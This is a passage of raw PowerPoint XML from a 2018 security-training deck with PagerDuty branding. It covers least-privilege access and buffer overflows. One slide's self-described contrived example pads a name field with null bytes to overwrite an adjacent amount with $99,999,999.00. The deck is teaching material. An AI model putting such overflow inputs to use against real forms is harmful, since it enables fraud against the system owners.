          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2400" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2401" name="borat.png" descr="borat.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11907335" y="134537"/>
            <a:ext cx="17604264" cy="13897013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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05"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406"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407" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2408" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2409" name="Always use the least permissive access you can."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Always use the least permissive access you can.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2410" name="KEY TAKEAWAY"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20250661" y="358292"/>
            <a:ext cx="3717418" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="25C15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KEY TAKEAWAY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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4" name="PagerDuty_logo_GREEN.png" descr="PagerDuty_logo_GREEN.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415"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416" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2417" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2418" name="Buffer Overflows"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="869950" y="4536281"/>
            <a:ext cx="22644099" cy="464343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gn="l">
              <a:defRPr sz="11200">
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Buffer Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2419" name="AND OTHER CLASSICS"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="997346" y="7489428"/>
            <a:ext cx="16644938" cy="1589485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr cap="all" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>AND OTHER CLASSICS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2420" name="Overflow.jpg" descr="Overflow.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12685667" y="101600"/>
            <a:ext cx="13812400" cy="13614400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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4"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425"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426" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2427" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2430" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8347643" y="1239086"/>
            <a:ext cx="7688714" cy="6112526"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="7688712" cy="6112525"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2428" name="frame.png" descr="frame.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="7688713" cy="6112526"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2429" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="302809" y="1093964"/>
              <a:ext cx="7083095" cy="4762289"/>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solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2431" name="We Owe You $5k"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10433953" y="2385231"/>
            <a:ext cx="3450393" cy="77785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100">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>We Owe You $5k</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2432" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8808677" y="5304361"/>
            <a:ext cx="6766647" cy="918153"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="E7EBEF"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:hueOff val="384618"/>
                    <a:satOff val="3869"/>
                    <a:lumOff val="5802"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2433" name="Name"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8788175" y="4623572"/>
            <a:ext cx="1181830" cy="66471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700">
                <a:solidFill>
                  <a:srgbClr val="53585F"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2434" name="Rich Adams"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8924553" y="5374509"/>
            <a:ext cx="6534894" cy="77785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lgn="l">
              <a:defRPr sz="3200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:t>Rich Adams</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2435" name="Tell us your name, we give you $5k."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9301080" y="3281665"/>
            <a:ext cx="5781842" cy="66471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700">
                <a:solidFill>
                  <a:srgbClr val="53585F"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Tell us your name, we give you $5k.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2436" name="Table"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1232677" y="8490339"/>
          <a:ext cx="22271843" cy="2730464"/>
        </p:xfrm>
        <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstCol="0" firstRow="1" lastCol="0" lastRow="0" bandCol="0" bandRow="1" rtl="0">
                <a:tableStyleId>{C7B018BB-80A7-4F77-B60F-C8B233D01FF8}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="10505496"/>
                <a:gridCol w="11766346"/>
              </a:tblGrid>
              <a:tr h="910154">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:tabLst>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                        <a:defRPr b="0" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>Name</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:solidFill>
                      <a:srgbClr val="3F7CAB"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:tabLst>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                        <a:defRPr b="0" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>Amount Owed</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:solidFill>
                      <a:srgbClr val="3F7CAB"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="910154">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>Rich Adams</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>$5,000.00</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="910154">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2437" name="This is a contrived example just to demonstrate the principle."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="879779" y="12490960"/>
            <a:ext cx="6974508" cy="447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000">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>This is a contrived example just to demonstrate the principle.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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41"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442"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443" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2444" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2447" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8347643" y="1239086"/>
            <a:ext cx="7688714" cy="6112526"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="7688712" cy="6112525"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2445" name="frame.png" descr="frame.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="7688713" cy="6112526"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2446" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="302809" y="1093964"/>
              <a:ext cx="7083095" cy="4762289"/>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solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2448" name="We Owe You $5k"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10433953" y="2385231"/>
            <a:ext cx="3450393" cy="77785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100">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>We Owe You $5k</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2449" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8808677" y="5304361"/>
            <a:ext cx="6766647" cy="918153"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="E7EBEF"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:hueOff val="384618"/>
                    <a:satOff val="3869"/>
                    <a:lumOff val="5802"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2450" name="Name"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8788175" y="4623572"/>
            <a:ext cx="1181830" cy="66471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700">
                <a:solidFill>
                  <a:srgbClr val="53585F"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2451" name="Rich Adams\00\00\00\00\00\00\00\00\00\00\00\00$99,999,999.00"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8924553" y="5374509"/>
            <a:ext cx="13680134" cy="77785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lgn="l" defTabSz="914400">
              <a:defRPr sz="3200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Rich Adams</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\00\00\00\00\00\00\00\00\00\00\00\00</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$99,999,999.00</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2452" name="Tell us your name, we give you $5k."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9301080" y="3281665"/>
            <a:ext cx="5781842" cy="66471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2700">
                <a:solidFill>
                  <a:srgbClr val="53585F"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Tell us your name, we give you $5k.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
